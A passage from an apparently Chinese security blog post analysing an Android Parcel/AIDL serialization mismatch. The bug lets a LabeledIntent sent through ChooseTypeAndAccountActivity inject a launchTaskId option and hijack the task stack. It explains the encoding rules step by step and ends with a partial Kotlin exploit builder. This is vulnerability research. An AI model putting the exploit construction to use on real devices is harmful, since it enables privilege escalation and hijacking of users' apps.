          <span class="k">return</span> <span class="kc">null</span><span class="o">;</span>
        <span class="o">}</span>
    <span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>AIDL 做代码生成时, 对于 Parcelable 类型的参数，因为类型是编译时已知的，生成的 Stub 代码中都是用 readTypedObject(Type.Creator) 来直接读入的，</p>

<p>而 ArrayMap / Bundle 中如果包含 Parcelable，则是先读出实际类型的字符串，再反射找到对应类或其父类的 Creator (使用 getField), 然后调用 Creator 的 static 方法 createFromParcel 来实现反序列化，</p>

<p>前者可以减少数据传输大小，且不需要反射提高了运行效率, 但是这样做可能存在一定的安全风险</p>

<h2 id="mismatch"><span class="me-2">Mismatch</span><a href="#mismatch" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>到这里答案就已经呼之欲出了，AIDL 在写入的时候，使用的是运行时类型的实例方法 <code class="language-plaintext highlighter-rouge">writeToParcel</code>, 而读入的时候使用声明类型的 Creator 字段的 <code class="language-plaintext highlighter-rouge">readFromParcel</code>, 这两个方法本来就不是配对的. 
如下图,我们传入的参数是 <code class="language-plaintext highlighter-rouge">A</code> 的子类 <code class="language-plaintext highlighter-rouge">A'</code>, 写入时因为 virtual-dispatch, 会按照 <code class="language-plaintext highlighter-rouge">A'</code> 规则写入，然而读出的时候确是按照 <code class="language-plaintext highlighter-rouge">A</code> 的规则来读，有一个多出的字段混淆到参数<code class="language-plaintext highlighter-rouge">B</code>里面去了</p>

<blockquote>
  <p>以下是 AIDL 声明为 <code class="language-plaintext highlighter-rouge">foo(A, B)</code>, 实际调用为 <code class="language-plaintext highlighter-rouge">foo(A', B)</code> 的序列化示意图</p>
</blockquote>

<p><a href="/assets/images/creator-mismatch/mismatch.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/mismatch.png" alt="Mismatch" loading="lazy"></a></p>

<p>SDK 中存在两个 Intent 的子类，<code class="language-plaintext highlighter-rouge">ReferrerIntent</code> 和 <code class="language-plaintext highlighter-rouge">LabeledIntent</code> ，其实现都是先写入了父类 <code class="language-plaintext highlighter-rouge">Intent</code> 的所有字段，然后添加了自己的私有字段, 如果用这两个类型作为 Intent 的参数，那么 startActivity 调用中位于 Intent 位置后的参数我们就都可以污染</p>

<h2 id="parcel-101"><span class="me-2">Parcel 101</span><a href="#parcel-101" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>为了能顺利理解后面的利用过程 , 需要对常见数据类型使用 Parcel 序列化时对应的规则有一些了解, 其代码实现都在 <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/native/libs/binder/Parcel.cpp">Parcel.cpp</a> 中</p>

<h3 id="parcelwritebytearraybytes"><span class="me-2">Parcel.writeByteArray(bytes)</span><a href="#parcelwritebytearraybytes" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>如果 bytes 是 null, 写入 i32 的 -1,</li>
  <li>否则按照 i32 写入 bytes 的长度,然后写入 bytes 的所有内容, 之后需要对内容做四字节对齐, 需要补齐的一到三个字节全部补 0x00</li>
</ul>

<p><a href="/assets/images/creator-mismatch/bytearray.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/bytearray.png" alt="Alt text" loading="lazy"></a></p>

<h3 id="parcelwritestring8str"><span class="me-2">Parcel.writeString8(str)</span><a href="#parcelwritestring8str" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>如果 str 是 null, 写入 i32 的 -1,</li>
  <li>否则按照 i32 写入 str 的长度, 然后依次写入每个字符, 再添加 \0 作为结尾, 最后按照 4 字节对齐, 需要补充的一到三个字符全部补 0x00</li>
</ul>

<p><a href="/assets/images/creator-mismatch/string8.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/string8.png" alt="Alt text" loading="lazy"></a></p>

<h3 id="parcelwritestring16str"><span class="me-2">Parcel.writeString16(str)</span><a href="#parcelwritestring16str" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>如果 str 是 null, 写入 i32 的 -1,</li>
  <li>否则按照 i32 写入字符串长度, 然后按照 char16_t 写入每个字符, 最后添加 0x0000 作为结尾, 整个按照 4 字节对齐, 如需要补齐, 再补 0x0000</li>
</ul>

<p><a href="/assets/images/creator-mismatch/string16.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/string16.png" alt="Alt text" loading="lazy"></a></p>

<h3 id="parcelwritestrongbinderbinder"><span class="me-2">Parcel.writeStrongBinder(binder)</span><a href="#parcelwritestrongbinderbinder" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>binder 的正常写入是 <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/native/libs/binder/Parcel.cpp;drc=418914a7c54f4aa0418b6ddbb5096b66286cd80e;l=240">28 个字节</a>, 对应于 一个 flat_binder_object 加上 i32 的 stability 的标志位, flat_binder_object 定义如下</p>

<div class="language-cpp highlighter-rouge"><div class="code-header">
        <span data-label-text="Cpp"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="k">struct</span> <span class="nc">flat_binder_object</span> <span class="p">{</span>
  <span class="k">struct</span> <span class="nc">binder_object_header</span> <span class="n">hdr</span><span class="p">;</span> <span class="c1">// a.k.a u32</span>
  <span class="n">__u32</span> <span class="n">flags</span><span class="p">;</span>
  <span class="k">union</span> <span class="p">{</span>
    <span class="n">binder_uintptr_t</span> <span class="n">binder</span><span class="p">;</span> <span class="c1">// a.k.a u64</span>
    <span class="n">__u32</span> <span class="n">handle</span><span class="p">;</span>
  <span class="p">};</span>
  <span class="n">binder_uintptr_t</span> <span class="n">cookie</span><span class="p">;</span> <span class="c1">// a.k.a u64</span>
<span class="p">};</span>
</pre></td></tr></tbody></table></code></div></div>

<p>如果读入的时候如果出现错误,
比如 hdr 字段读出来不是预设的两个值(<code class="language-plaintext highlighter-rouge">BINDER_TYPE_BINDER</code> | <code class="language-plaintext highlighter-rouge">BINDER_TYPE_HANDLER</code>), 或者该区间数据在 Parcel.mObjects 中没有被记录为一个 Binder 等, 则上层拿到的 binder 是 null, 且此时不会继续调用 <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/native/libs/binder/Parcel.cpp;drc=397dd78fcdcfed36ee62302e2b90712e2d784364;l=188">finishUnflattenBinder</a>, 所以不会继续读 stability 字段, 此时仅消耗了 24 个字节,</p>

<p><a href="/assets/images/creator-mismatch/binder.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/binder.png" alt="Alt text" loading="lazy"></a></p>

<p>如上图, 我们在将一个正常的 Binder 写入后, 将 dataPosition 设置为 binder 之前的位置. 然后连续 7 次调用 readInt 方法来读取刚刚写入的 28 个字节对应的 mData. 此时前 24 个字节本应是 binder. 然而如果使用了 readInplace、readAligned 或 read 等方法(readInt 间接调用了 readInplace) 来读取对应的 mData，将会触发 <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/native/libs/binder/Parcel.cpp;drc=418914a7c54f4aa0418b6ddbb5096b66286cd80e;l=1722">validateReadData</a> 的检查逻辑. 该逻辑通过查看 Parcel 的 mObjects 记录确定读取的区域是否是 binder. 如果是的话校验将无法通过，返回 0. 最后四个字节是 stability，可以正常读取。</p>

<p>总结一下, binder 在 Parcel.mData 中的偏移在 Parcel.mObjects 中都有记录, 使用 readStrongBinder 读取非标记为 binder 的 mData 区间或使用非 readStrongBinder 读取标记为 binder 的区间, 得到的结果都不是我们预期的</p>

<h3 id="parcelwritetypedobject"><span class="me-2">Parcel.writeTypedObject(…)</span><a href="#parcelwritetypedobject" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>如果是 null, 写入 i32 的 0</li>
  <li>否则写入 i32 的 1, 并按照对应 Parcelable 子类的实现依次写入其他内容</li>
</ul>

<p><a href="/assets/images/creator-mismatch/user-handle.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/user-handle.png" alt="Alt text" loading="lazy"></a></p>

<h3 id="parcelwritetypedobjectbundleof"><span class="me-2">Parcel.writeTypedObject(bundleOf(…))</span><a href="#parcelwritetypedobjectbundleof" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Bundle 本身只是 Parcelable 的一种实现而已, 但是因为太常用, 这里单独说明一下他自身的序列化实现</p>

<ul>
  <li>如果内部的 map 是 null 或者 size 是 0,写入 i32 的 0</li>
  <li>
    <p>否则</p>

    <ol>
      <li>使用 i32 写入内部 ArrayMap 在序列化之后占用的整个长度 (back-patch-length)</li>
      <li>使用 i32 写入魔数 0x4C444E42 // BNDL</li>
      <li>使用 i32 写入 map 的 entry 数量</li>
      <li>使用 String16 写入 key 的内容</li>
      <li>使用 i32 写入 value 的类型</li>
      <li>按照 value 的运行时类型, 写入 value 的序列化内容</li>
      <li>重复 4,5,6 直到写完所有的 entry</li>
    </ol>

    <p><a href="/assets/images/creator-mismatch/bundle.png" class="popup img-link shimmer"><img src="/assets/images/creator-mismatch/bundle.png" alt="Alt text" loading="lazy"></a></p>

    <p>上图的前四个字节是按照 TypedObject 写入的 i32 的 1</p>
  </li>
</ul>

<h3 id="parcelenforcenodataavail"><span class="me-2">Parcel.enforceNoDataAvail</span><a href="#parcelenforcenodataavail" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Android 13 引入了一个新的 API <code class="language-plaintext highlighter-rouge">Parcel.enforceNoDataAvail</code>, 用于缓解一些序列化不对称的利用, AIDL 工具在对 aidl 文件做代码生成的时候, 会在 onTransact 的每个分支里面加上这个调用, 确保对端传来的 Parcel 的数据会被读完,否则会直接抛异常</p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre>  <span class="k">case</span> <span class="nl">TRANSACTION_startActivity:</span>
        <span class="o">{</span>
          <span class="o">....</span>

          <span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">ProfilerInfo</span> <span class="n">_arg9</span><span class="o">;</span>
          <span class="n">_arg9</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readTypedObject</span><span class="o">(</span><span class="n">android</span><span class="o">.</span><span class="na">app</span><span class="o">.</span><span class="na">ProfilerInfo</span><span class="o">.</span><span class="na">CREATOR</span><span class="o">);</span>
          <span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Bundle</span> <span class="n">_arg10</span><span class="o">;</span>
          <span class="n">_arg10</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="na">readTypedObject</span><span class="o">(</span><span class="n">android</span><span class="o">.</span><span class="na">os</span><span class="o">.</span><span class="na">Bundle</span><span class="o">.</span><span class="na">CREATOR</span><span class="o">);</span>

          <span class="c1">// ⬇️</span>
          <span class="n">data</span><span class="o">.</span><span class="na">enforceNoDataAvail</span><span class="o">();</span>
          <span class="c1">// ⬆️</span>

          <span class="kt">int</span> <span class="n">_result</span> <span class="o">=</span> <span class="k">this</span><span class="o">.</span><span class="na">startActivity</span><span class="o">(</span><span class="n">_arg0</span><span class="o">,</span> <span class="n">_arg1</span><span class="o">,</span> <span class="n">_arg2</span><span class="o">,</span> <span class="n">_arg3</span><span class="o">,</span> <span class="n">_arg4</span><span class="o">,</span> <span class="n">_arg5</span><span class="o">,</span> <span class="n">_arg6</span><span class="o">,</span> <span class="n">_arg7</span><span class="o">,</span> <span class="n">_arg8</span><span class="o">,</span> <span class="n">_arg9</span><span class="o">,</span> <span class="n">_arg10</span><span class="o">);</span>
          <span class="n">reply</span><span class="o">.</span><span class="na">writeNoException</span><span class="o">();</span>
          <span class="n">reply</span><span class="o">.</span><span class="na">writeInt</span><span class="o">(</span><span class="n">_result</span><span class="o">);</span>
          <span class="k">break</span><span class="o">;</span>
        <span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>   <span class="kd">public</span> <span class="kt">void</span> <span class="nf">enforceNoDataAvail</span><span class="o">()</span> <span class="o">{</span>
        <span class="kd">final</span> <span class="kt">int</span> <span class="n">n</span> <span class="o">=</span> <span class="n">dataAvail</span><span class="o">();</span>
        <span class="k">if</span> <span class="o">(</span><span class="n">n</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="o">)</span> <span class="o">{</span>
            <span class="k">throw</span> <span class="k">new</span> <span class="nf">BadParcelableException</span><span class="o">(</span><span class="s">"Parcel data not fully consumed, unread size: "</span> <span class="o">+</span> <span class="n">n</span><span class="o">);</span>
        <span class="o">}</span>
   <span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<h2 id="authenticator"><span class="me-2">Authenticator</span><a href="#authenticator" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>在了解了原理以及前置知识之后，来整理一下利用过程，patch 是补在 <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/accounts/ChooseTypeAndAccountActivity.java">ChooseTypeAndAccountActivity.java</a>, 因为其身份是 <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/res/AndroidManifest.xml;drc=422648fdfad684086abf90141739a090fc818787;l=6691"><code class="language-plaintext highlighter-rouge">SYSTEM_UID</code></a> (进程是 android:ui 而不是 system_process), 是静默提权的最常见路径，正常的业务是这样</p>

<ol>
  <li>App 在 manifest 里面注册自己的 AccountType， 并实现 <code class="language-plaintext highlighter-rouge">AccountAuthenticator</code></li>
  <li>App 主动调用 <code class="language-plaintext highlighter-rouge">ChooseTypeAndAccountActivity</code>，传入 自己的 AccountType 让其根据 AccountType 来添加账号</li>
  <li><code class="language-plaintext highlighter-rouge">ChooseTypeAndAccountActivity</code> 向 <code class="language-plaintext highlighter-rouge">AccountManagerService</code> 请求添加对应 AccountType 的 Intent， <code class="language-plaintext highlighter-rouge">AccountManagerService</code> 根据注册信息找到我们的 AccountAuthenticator， IPC 调用 AccountAuthenticator 中的 <code class="language-plaintext highlighter-rouge">addAccount</code>方法, 拿到了一个 Bundle,里面包含一个 key 为 <code class="language-plaintext highlighter-rouge">AccountManager.KEY_INTENT</code>, value 为指引调用方添加对应账号的 Intent 的项</li>
  <li><code class="language-plaintext highlighter-rouge">AccountManagerService</code> 从 Bundle 中取出 Intent 后做了一大堆详尽的<a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/services/core/java/com/android/server/accounts/AccountManagerService.java;drc=47fffdd53115a9af1820e3f89d8108745be4b55d;l=4895">检查</a>, 确认该 Intent 没有危险之后，把刚才的整个 Bundle 返回给 <code class="language-plaintext highlighter-rouge">ChooseTypeAndAccountActivity</code></li>
  <li><code class="language-plaintext highlighter-rouge">ChooseTypeAndAccountActivity</code> 从 Bundle 中取出 Intent，使用 <code class="language-plaintext highlighter-rouge">startActivityForResult()</code> 调用该 Intent</li>
</ol>

<h2 id="launchtaskid"><span class="me-2">LaunchTaskId</span><a href="#launchtaskid" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>考虑到 Intent 本身已经经过了 <code class="language-plaintext highlighter-rouge">checkKeyIntent</code> 的搜身，以及上文的分析，这次要利用的就是 <code class="language-plaintext highlighter-rouge">IActivityTaskManager.startActivity</code> 调用中 Intent 位置后面的参数, 分析一下可能存在利用的参数</p>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">resolvedType</code> -&gt; 可以影响 intent 的 resolve 流程，但是这个参数本身就是由 intent 得出的，可以控制 intent 的前提下已经可以控制他了，所以没有意义</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">resultTo</code> -&gt; 是个 Binder, Binder 在 Parcel 的 mObjects 中也有位置记录，所以只是修改这个值还不行，同时我个人没想到修改他之后可以怎么利用</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">resultWho</code> -&gt; 没太大用</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">requestCode</code> -&gt; 没太大用</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">flags</code> -&gt; 注意这个不是 Intent 的 flag，而是一个告诉 AMS 是否需要启动调试模式来打开对应的 Activity 的 flag， 哪天需要调试一个 app 的时候再来用</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">profilerInfo</code> -&gt; 性能数据相关，没具体看</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">options</code> -&gt; 也是个 Bundle，一般是转成 ActivityOptions 再用，里面有非常多的选项，比如如果能设置 launchTaskId，就可以把我们的 Activity 启动到任意堆栈，实现任务栈劫持, 决定了, 就是它</p>
  </li>
</ul>

<h2 id="labeledintent"><span class="me-2">LabeledIntent</span><a href="#labeledintent" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>如前文所说，Intent 有两个子类 <code class="language-plaintext highlighter-rouge">LabeledIntent</code> 和 <code class="language-plaintext highlighter-rouge">ReferrerIntent</code>， 其中 <code class="language-plaintext highlighter-rouge">ReferrerIntent</code> 只比 Intent 多了一个 String 字段，而 startActivity AIDL 调用中 intent 参数接下来是 <code class="language-plaintext highlighter-rouge">resolvedType</code>, 也是 String， 刚好会把 <code class="language-plaintext highlighter-rouge">ReferrerIntent</code> 多余的字段给抵消掉，导致后续只能用 <code class="language-plaintext highlighter-rouge">ChooseTypeAndAccountActivity</code> 自己设置的参数通过错位来攻击自己，难度挺大</p>

<p>分析下 <code class="language-plaintext highlighter-rouge">LabeledIntent</code> 相对于 Intent 写多的<a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/text/TextUtils.java;drc=9a6274388299f6a3032c18b9797f56ece313b389;l=794">字段</a></p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="kd">public</span> <span class="kt">void</span> <span class="nf">writeToParcel</span><span class="o">(</span><span class="nc">Parcel</span> <span class="n">dest</span><span class="o">,</span> <span class="kt">int</span> <span class="n">parcelableFlags</span><span class="o">)</span> <span class="o">{</span>
    <span class="kd">super</span><span class="o">.</span><span class="na">writeToParcel</span><span class="o">(</span><span class="n">dest</span><span class="o">,</span> <span class="n">parcelableFlags</span><span class="o">);</span>
    <span class="n">dest</span><span class="o">.</span><span class="na">writeString</span><span class="o">(</span><span class="n">mSourcePackage</span><span class="o">);</span> <span class="c1">// 1</span>
    <span class="n">dest</span><span class="o">.</span><span class="na">writeInt</span><span class="o">(</span><span class="n">mLabelRes</span><span class="o">);</span> <span class="c1">// 2</span>
    <span class="nc">TextUtils</span><span class="o">.</span><span class="na">writeToParcel</span><span class="o">(</span><span class="n">mNonLocalizedLabel</span><span class="o">,</span> <span class="n">dest</span><span class="o">,</span> <span class="n">parcelableFlags</span><span class="o">);</span> <span class="c1">// 3</span>
    <span class="n">dest</span><span class="o">.</span><span class="na">writeInt</span><span class="o">(</span><span class="n">mIcon</span><span class="o">);</span> <span class="c1">// 4</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<ul>
  <li><code class="language-plaintext highlighter-rouge">mSourcePackage</code> 按照 String16 写入</li>
  <li><code class="language-plaintext highlighter-rouge">labelRes</code> 按照 i32 写入</li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mNonLocalizedLabel</code>, 是一个 CharSequence, 使用 <code class="language-plaintext highlighter-rouge">TextUtils.writeToParcel</code> 来序列化, 比较复杂的一个类, 按照内容是否是 Spanned, 可以简单的分为两条路径写入</p>

    <blockquote>
      <p>路径一</p>
    </blockquote>

    <ol>
      <li>按照 i32 写入 数字 1， 表示下面的内容不是 Spanned， 而是普通字符</li>
      <li>按照 String8 写入字符串内容</li>
    </ol>

    <blockquote>
      <p>路径二</p>
    </blockquote>

    <ol>
      <li>按照 i32 写入数字 0，表示下面的内容是 Spanned</li>
      <li>按照 String8 写入字符串内容</li>
      <li>按照以下格式依次写入每个 ParcelableSpan 的子类
        <ol>
          <li>按照 i32 写入这个 ParcelableSpan 的 StyleId (表示下面为哪种 Span，比如后面使用的 URLSpan 对应的 Id 是 11)</li>
          <li>按照 ParcelableSpan 自己的子类实现，写入 ParcelableSpan 自身 ( 有 29 种可能 )</li>
          <li>依次写入这个 ParcelableSpan 的开始位置，结束位置，flags 等三个信息， 均按照 i32 格式写入</li>
        </ol>
      </li>
      <li>按 i32 格式写入 数字 0</li>
    </ol>
  </li>
  <li><code class="language-plaintext highlighter-rouge">mIcon</code> 按照 i32 写入</li>
</ul>

<p>路径一 看似比较简单, 仅需把需要的参数写入这个 String8 的前一段, 然后组装一个 Bundle</p>

<ol>
  <li>向 Bundle 中写入 <code class="language-plaintext highlighter-rouge">launchTaskId</code> 为 key，需要插入的堆栈 id 为 value 的 entry,</li>
  <li>向 Bundle 中写入  <code class="language-plaintext highlighter-rouge">_</code> 为 key， ByteArray 为 value 的 entry， 这个 ByteArray 的长度需要特别计算， 用来消耗掉 Parcel 里面剩余的所有数据</li>
  <li>根据上面 ByteArray 计算得到的长度, 调整 Bundle 里面的 back-patch length,</li>
  <li>把这个不完整的 Bundle 整个作为 String8 字符串的后段，同时调整 String8 的长度使其合法</li>
</ol>

<p>之后得到的String8字符串就是 payload, 然而在实际编码的过程中, String8 有一个极大的坑,就是读入的时候会对 String8 的合法性做一定的检查,如果中间存了太多的 0, 从 <code class="language-plaintext highlighter-rouge">ChooseTypeAndAccountActivity</code> 请求到 <code class="language-plaintext highlighter-rouge">AMS</code> 序列化 <code class="language-plaintext highlighter-rouge">LabeledIntent</code>的时候,会写成一个空字符串, 导致 payload 丢失, 相比之下 String16 则几乎不存在类似的坑, 所以这里选择相对复杂一点的路径二, 同时选择 <code class="language-plaintext highlighter-rouge">android.text.style.URLSpan</code> 作为 ParcelableSpan 的子类, 因为里面会有一个 String16</p>

<h2 id="contraption"><span class="me-2">Contraption</span><a href="#contraption" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>现在来模拟一下 AMS 的整个读入过程</p>

<ol>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">resolvedType</code>, 实际读入 LabeledIntent 里面 <code class="language-plaintext highlighter-rouge">mSourcePackage</code></li>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">resultTo</code>(24 字节), 对应于 LabeledIntent 里面的 <code class="language-plaintext highlighter-rouge">labelRes</code> (4 字节), <code class="language-plaintext highlighter-rouge">mNonLocalizedLabel</code> 中的第一个表示 kind 的 i32(4 字节), <code class="language-plaintext highlighter-rouge">mNonLocalizedLabel</code> 的长度(4 字节), <code class="language-plaintext highlighter-rouge">mNonLocalizedLabel</code> 的字符串内容以及结束符 (“@@@\NUL” =&gt; 4 字节), URLSpan 的 <code class="language-plaintext highlighter-rouge">StyleId</code> (4 字节), <code class="language-plaintext highlighter-rouge">URLSpan</code> 内容字符串的长度(4 字节)</li>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">resultWho</code>, 对应于以 URLSpan 内容字符串前四个字节为长度的 String16</li>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">requestCode</code>(4 字节), 我们让他继续在 URLSpan 内容字符串中读取,并且保证读出来的数字为 0</li>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">flags</code> (4 字节), 同上,并且保证都出来的数字为 0</li>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">profilerInfo</code>, 同上, 并且保证都出来的数据为 null</li>
  <li>AMS 读取 <code class="language-plaintext highlighter-rouge">options</code>, 我们保证这个位置的数据是符合 Bundle 格式的开始, 并且 bundle 中包含了想要设置的 launchTaskId 的 entry, 和一个 key 为 ‘_’, value 为 精心设计了长度的 ByteArray 的 entry, 当 URLSpan 的内容字符串被读完之后, 确保还没有达到 ByteArray 设置的长度</li>
  <li>AMS 把后面的数据当做 ByteArray 的内容继续读取, 对应于 <code class="language-plaintext highlighter-rouge">mNonLocalizedLabel</code> 最后的标识数字 0, LabeledIntent 里面的 <code class="language-plaintext highlighter-rouge">mIcon</code>(0), ChooseTypeAndAccountActivity 本身提供的 <code class="language-plaintext highlighter-rouge">resolvedType</code>(null@String16), <code class="language-plaintext highlighter-rouge">resultTo</code>(28 字节), <code class="language-plaintext highlighter-rouge">resultWho</code>(null), <code class="language-plaintext highlighter-rouge">requestCode</code>(i32), <code class="language-plaintext highlighter-rouge">flags</code>(i32), <code class="language-plaintext highlighter-rouge">profilerInfo</code>(null), <code class="language-plaintext highlighter-rouge">options</code>(null) 等</li>
  <li>到这里 ByteArray 需要刚好读取完成，同时由于 bundle 里面只有两个 key，所以 options 也刚好读完，而 options 又是该 AIDL 调用的最后一个参数，所以整个 Parcel 需要刚好被消耗光， 保证了 Parcel.enforceNoDataAvail 不会在 AMS 里面抛异常</li>
</ol>

<p>第 8 步中由于读取的 ByteArray 中包含了一个 binder 的位置 (前面说过，Parcel 的 mObjects 中记录了所有 binder 在 mData 中的偏移)， 过不了 <code class="language-plaintext highlighter-rouge">validateReadData</code>校验， 所以最后上层会读出来一个空的 ByteArray, 但是不会抛错，并且也消耗完了 Parcel 的整个数据，所以对我们的后续操作无影响</p>

<p>于是可以构造下面的利用代码，虽然烦琐，但是直观，其中几个 fixme 的部分是需要计算的长度</p>

<div class="language-kotlin highlighter-rouge"><div class="code-header">
        <span data-label-text="Kotlin"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
</pre></td><td class="rouge-code"><pre>     <span class="k">fun</span> <span class="nf">contraption</span><span class="p">():</span> <span class="nc">LabeledIntent</span> <span class="p">{</span>
        <span class="kd">val</span> <span class="py">intent</span> <span class="p">=</span> <span class="nc">Parcel</span><span class="p">.</span><span class="nf">obtain</span><span class="p">().</span><span class="nf">apply</span> <span class="p">{</span>
          <span class="n">intentFor</span><span class="p">&lt;</span><span class="nc">LoginActivity</span><span class="p">&gt;().</span><span class="nf">setAction</span><span class="p">(</span><span class="s">"hello"</span><span class="p">).</span><span class="nf">writeToParcel</span><span class="p">(</span><span class="k">this</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
        <span class="p">}</span>

        <span class="kd">val</span> <span class="py">taskId</span> <span class="p">=</span> <span class="mi">218</span>

        <span class="kd">val</span> <span class="py">tail</span> <span class="p">=</span> <span class="nc">Parcel</span><span class="p">.</span><span class="nf">obtain</span><span class="p">().</span><span class="nf">apply</span> <span class="p">{</span>
          <span class="nf">writeString</span><span class="p">(</span><span class="k">null</span><span class="p">)</span> <span class="c1">// mSourcePackage =&gt; resolvedType</span>
          <span class="nf">writeInt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">// labelRes  =&gt; hdr</span>

          <span class="nf">writeInt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">// kind1 =&gt; flags</span>
          <span class="nf">writeString8</span><span class="p">(</span><span class="s">"AAA"</span><span class="p">)</span> <span class="c1">// text =&gt; binder</span>
          <span class="nf">writeInt</span><span class="p">(</span><span class="mi">11</span><span class="p">)</span> <span class="c1">// TextUtils.URL_SPAN =&gt; cookie.1</span>

          <span class="nf">run</span> <span class="p">{</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="nf">fixme</span><span class="p">(</span><span class="mi">63</span><span class="p">))</span> <span class="c1">// URLSpan.mURL text len =&gt; cookie.2</span>

            <span class="c1">// we don't have a valid type ( sb*| sh* ), so no stability is read</span>
            <span class="c1">// writeInt(65)  // ? =&gt; ?stability</span>

            <span class="nf">writeString</span><span class="p">(</span><span class="k">null</span><span class="p">)</span> <span class="c1">//  URLSpan.mURL.chars.01 =&gt; resultWho(null)</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">77</span><span class="p">)</span> <span class="c1">// URLSpan.mURL.chars.23 =&gt; requestCode</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">88</span><span class="p">)</span> <span class="c1">// URLSpan.mURL.chars.45 =&gt; flags</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">// URLSpan.mURL.chars.67 =&gt; profilerInfo(null)</span>
            <span class="nf">run</span> <span class="p">{</span>
              <span class="nf">writeInt</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1">// URLSpan.mURL.chars.89 =&gt; options != null</span>

